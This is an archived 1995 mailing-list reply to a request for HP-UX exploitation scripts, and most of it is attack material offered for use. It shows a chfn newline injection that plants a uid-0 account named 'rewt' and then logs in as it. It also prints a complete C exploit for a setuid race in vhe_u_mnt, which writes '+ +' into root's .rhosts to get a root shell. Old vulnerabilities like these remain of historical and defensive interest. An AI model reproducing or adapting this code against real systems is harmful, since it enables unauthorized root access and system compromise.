[90] in Intrusion Detection Systems
Re: HP-UX Explotation/Repair/Info scripts
daemon@ATHENA.MIT.EDU (Andrew Prendergast)
Fri May 5 23:08:42 1995
Date: Sat, 6 May 1995 10:13:39 +1000
To: ids@uow.edu.au
From: ap@ozonline.com.au (Andrew Prendergast)
Reply-To: ids@uow.edu.au
>To: sysec@BIX.com
>From: ap@www.ozonline.com.au (Andrew Prendergast)
>Subject: Re: HP-UX Explotation/Repair/Info scripts
>Cc:
>Bcc:
>X-Attachments:
>
>>I Will be soon changing some SunOS platforms to HP-UX and I feel like lost
from the security point view wich I always s
>>tudied on the Sun machines.
>>I would like if possible any kind of explotaion scripts , detailed
information, etc about existing HP bugs. HP folks sa
>>y not to worry "HP-UX is the most secure", I don't beleive them...
>>Any help will be very appreciated..
>>
>>
>Here's a start.
>
>HP/UX (below 7.0) - chfn problem - chfn accepts newlines, etc...
>
>% chfn -f looser^Mrewt::0:0::/:/bin/sh
>% rlogin localhost -l rewt
>Warning: .lastlogin not found.
>#
>
>On the HP security list?
>Check this out for info...
>-------------------------------------------------------------------------------
>
>To obtain a copy of the HP SupportLine mail service user's guide, send the
>following (in the TEXT PORTION OF THE MESSAGE to) to the HP SupportLine mail
>service.
>
>To: support@support.mayfield.hp.com
>
>Message Text:
>
> send guide.txt
>
>-------------------------------------------------------------------------------
>
>Here's an exploit script - work it out yourself...
>/***
> *
> * HP-UX /usr/etc/vhe/vhe_u_mnt bug exploit.
> *
> * This bug is exhibited in all versions of HP-UX that contain
> * /usr/etc/vhe/vhe_u_mnt setuid to root.
> *
> * This program written by pluvius@io.org
> * The exploit code itself written by misar@rbg.informatik.th-darmstadt.de
> *
> * I found that the exploit code didn't always work due to a race between
> * the child and the parent, and that a link() called failed due to
> * the fact that user directories and the /tmp are in different file systems
> * so you must create a symlink.
> * I added in a call to alarm() so that the timing between the two processes
> * is ok..
> *
> ***/
>#include <stdio.h>
>#include <stdlib.h>
>#include <pwd.h>
>#include <string.h>
>#include <unistd.h>
>#include <signal.h>
>#include <netdb.h>
>#include <sys/wait.h>
>#include <sys/stat.h>
>#include <sys/utsname.h>
>
>#define BUGGY_PROG "/usr/etc/vhe/vhe_u_mnt"
>#define NAME "<defunct>"
>
>int test_host()
>{ struct utsname name;
> uname(&name);
> return !strcmp(name.sysname,"HP-UX");
>}
>int check_mount()
>{ struct stat my_buf;
> if (stat(BUGGY_PROG, &my_buf))
> return 0;
> return !((my_buf.st_mode & S_ISUID) != S_ISUID);
>}
>void pause_handler()
>{
> signal(SIGALRM,pause_handler);
>}
>int rhost_user(user)
>char *user;
>{
> struct passwd *info;
> char homedir[80];
> int fd[2];
> int procno;
> struct stat my_buf;
> int fsize;
>
> info = getpwnam(user);
> if (info==NULL) {
> fprintf(stderr,"ERROR: Unknown user %s\n",user);
> exit(-3);
> }
> strcpy(homedir,info->pw_dir);
> if (homedir[strlen(homedir)-1] != '/')
> strcat(homedir,"/");
> strcat(homedir,".rhosts");
>
> signal(SIGALRM,pause_handler);
> memset(my_buf,0,sizeof(my_buf));
> stat(homedir,&my_buf);
> fsize = my_buf.st_size;
>
> /* now the exploit code... slightly modified.. but mostly from the source */
> /* by misar@rbg.informatik.th-darmstadt.de */
> pipe(fd);
> if (!(procno=fork())) {
> close(0);
> dup(fd[0]);
> close(fd[1]);
> close(1);
> close(2);
> alarm(2); /* wait for other process */
> nice(5);
> execl(BUGGY_PROG,NAME,NULL);
> } else {
> FILE *out;
> char listfile[25];
> char mntfile[25];
> struct stat dummy;
>
> close(1);
> dup(fd[1]);
> close(fd[0]);
> write(1,"+\n",2);
> sprintf(listfile,"/tmp/vhe_%d",procno+2);
> sprintf(mntfile,"/tmp/newmnt%d",procno+2);
> while (stat(listfile,&dummy));
> unlink(listfile);
> out=fopen(listfile,"w");
> fputs("+ +\n",out);
> fclose(out);
> unlink(mntfile);
> symlink(homedir,mntfile);
> waitpid(procno,NULL,0);
> }
> stat(homedir,&my_buf);
> return (fsize != my_buf.st_size);
>}
>
>void main(argc,argv)
>int argc;
>char *argv[];
>{
> int i;
> int rhost_root = 0;
> char userid[10];
>
> if (!test_host()) {
> fprintf(stderr,"ERROR: This bug is only exhibited by HP-UX\n");
> exit(-1);
> }
>
> if (!check_mount()) {
> fprintf(stderr,
> "ERROR: %s must exist and be setuid root to exploit this bug\n",
> BUGGY_PROG);
> exit(-2);
> }
>
> for (i=0;(i<5)&&(!rhost_root);i++) {
> fprintf(stderr,"Attempting to .rhosts user root..");
> if (!rhost_user("root")) {
> fprintf(stderr,"failed.\n");
> } else {
> fprintf(stderr,"succeeded\n");
> rhost_root = 1;
> }
> }
>
> if (!rhost_root) {
> /* failed to rhost root, try user 'bin' */
> fprintf(stderr,"Too many failures.. trying user bin...");
> if (!rhost_user("bin")) {
> fprintf(stderr,"failed.\n");
> exit(-4);
> }
> fprintf(stderr,"succeeded.\n");
> strcpy(userid,"bin");
> } {
> strcpy(userid,"root");
> }
> fprintf(stderr,"now type: \"remsh localhost -l %s csh -i\" to login\n",
> userid);
>}
>
>
>any other contributors?
>
>Andrew Prendergast
>
